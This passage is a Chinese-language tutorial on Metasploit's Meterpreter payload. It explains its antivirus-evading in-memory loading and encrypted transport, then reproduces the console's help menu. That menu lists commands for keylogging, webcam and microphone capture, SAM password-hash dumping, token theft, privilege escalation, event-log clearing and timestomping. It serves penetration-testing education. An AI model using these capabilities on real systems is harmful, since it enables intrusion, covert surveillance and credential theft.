Metasploit 提供了各种主流操作系统和平台上的Meterpreter 版本，包括Windows，Linux，BSD 系统，并且同时支持x86和x64平台。另外，Meterpreter 还提供了基于Java和PHP 的实现，以应用在各种不同的环境中。

纯内存工作模式：

执行漏洞渗透攻击的时候，会直接装载Meterpreter 的动态链接库到目标系统进程的内存空间。而不是先将Meterpreter 上传到磁盘，然后调用 Loadlibrary加载动态链接库来启动Meterpreter。这种纯内存工作模式的好处就是启动隐蔽，很难被杀毒软件监测到。此外，也不需要访问目标主机的磁盘，基本不会留下入侵的证据。虽然现在的内存分析与提取技术能事后捕获到Meterpreter 的蛛丝马迹，但这种技术不仅难度大，而且成功率低。并且这种模式不会创建新的进程。

灵活且加密的通信协议：

Meterpreter还提供了灵活加密的客户端服务通信协议，能够对网络传输进行加密，同时这种通信技术支持灵活的功能扩展。

Meterpreter的网络通信协议采用TLV数据封住格式。

易于扩展：

Meterpreter在功能上来说不是一般的shellcode能比拟的，但如果用户需要一些特殊或者定制的功能，也可以轻易的在Meterpreter中添加扩展或插件来实现。

常用基本命令：

meterpreter > ?

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bg            Alias for background
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information or control active channels
    close         Closes a channel
    detach        Detach the meterpreter session (for http/https)
    disable_unic  Disables encoding of unicode strings
    ode_encoding
    enable_unico  Enables encoding of unicode strings
    de_encoding
    exit          Terminate the meterpreter session
    get_timeouts  Get the current session timeout values
    guid          Get the session GUID
    help          Help menu
    info          Displays information about a Post module
    irb           Open an interactive Ruby shell on the current session
    load          Load one or more meterpreter extensions
    machine_id    Get the MSF ID of the machine attached to the session
    migrate       Migrate the server to another process
    pivot         Manage pivot listeners
    pry           Open the Pry debugger on the current session
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    secure        (Re)Negotiate TLV packet encryption on the session
    sessions      Quickly switch to another session
    set_timeouts  Set the current session timeout values
    sleep         Force Meterpreter to go quiet, then re-establish session
    ssl_verify    Modify the SSL certificate verification setting
    transport     Manage the transport mechanisms
    use           Deprecated alias for "load"
    uuid          Get the UUID for the current session
    write         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcat          Read the contents of a local file to the screen
    lcd           Change local working directory
    lls           List local files
    lmkdir        Create new directory on local machine
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    enumdesktops  List all accessible desktops and window stations
    getdesktop    Get the current meterpreter desktop
    idletime      Returns the number of seconds the remote user has been idle
    keyboard_sen  Send keystrokes
    d
    keyevent      Send key events
    keyscan_dump  Dump the keystroke buffer
    keyscan_star  Start capturing keystrokes
    t
    keyscan_stop  Stop capturing keystrokes
    mouse         Send mouse events
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop
    setdesktop    Change the meterpreters current desktop
    uictl         Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds
    webcam_chat   Start a video chat
    webcam_list   List webcams
    webcam_snap   Take a snapshot from the specified webcam
    webcam_strea  Play a video stream from the specified webcam
    m


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system


Priv: Elevate Commands
======================

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------       -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------       -----------
    timestomp     Manipulate file MACE attributes

如上就是一些就基本命令。